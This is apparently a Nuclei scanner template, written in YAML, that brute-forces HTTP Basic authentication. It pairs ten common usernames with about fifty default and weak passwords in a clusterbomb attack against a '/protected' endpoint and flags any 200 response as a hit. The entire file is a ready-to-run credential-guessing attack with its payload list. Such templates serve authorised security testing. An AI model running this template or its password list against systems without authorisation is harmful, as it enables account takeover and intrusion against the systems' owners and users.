id: basic-auth-bruteforce

info:
  name: Basic Auth Bruteforce
  author: "@w4cky_"
  severity: high

  # Impotent Notes:-
  # This is specific template to work with basic 401 authentication endpoint.
  # Do not run this template on non basic authentication related endpoints to avoid false positive results.

requests:

  - payloads:
      username:
        - admin
        - manager
        - administrator
        - username
        - login
        - anonymous
        - test
        - guest
        - root
        - demo

      password:
        - admin
        - pass1
        - pass1
        - root
        - welcome
        - p@ssw0rd
        - user
        - test
        - testest
        - dupa8
        - admin123
        - admin1234
        - admin12345
        - anonymous
        - manager
        - linux
        - system
        - oracle
        - administrator
        - 11111111
        - qwerty123
        - cisco123
        - admin123456
        - 1qazXSW@
        - master
        - 123qweasd
        - 1qaz2wsx
        - 123456789
        - 1234567890
        - !qaz@wsx
        - !q@w
        - wubao
        - pa55w0rd
        - 123abc
        - 123456
        - 123456789
        - qwerty
        - password
        - 1111111
        - 12345678
        - abc123
        - 1234567
        - password1
        - 12345
        - 1234567890
        - 123123
        - 000000
        - Iloveyou
        - 1234
        - 1q2w3e4r5t
        - Qwertyuiop
        - 123
        - Monkey
        - Dragon
        - demo

    attack: clusterbomb

    raw:
      - |
        GET /protected HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0
        Accept-Language: en-US,en;q=0.9
        Connection: close

    matchers:
      - type: status
        status:
          - 200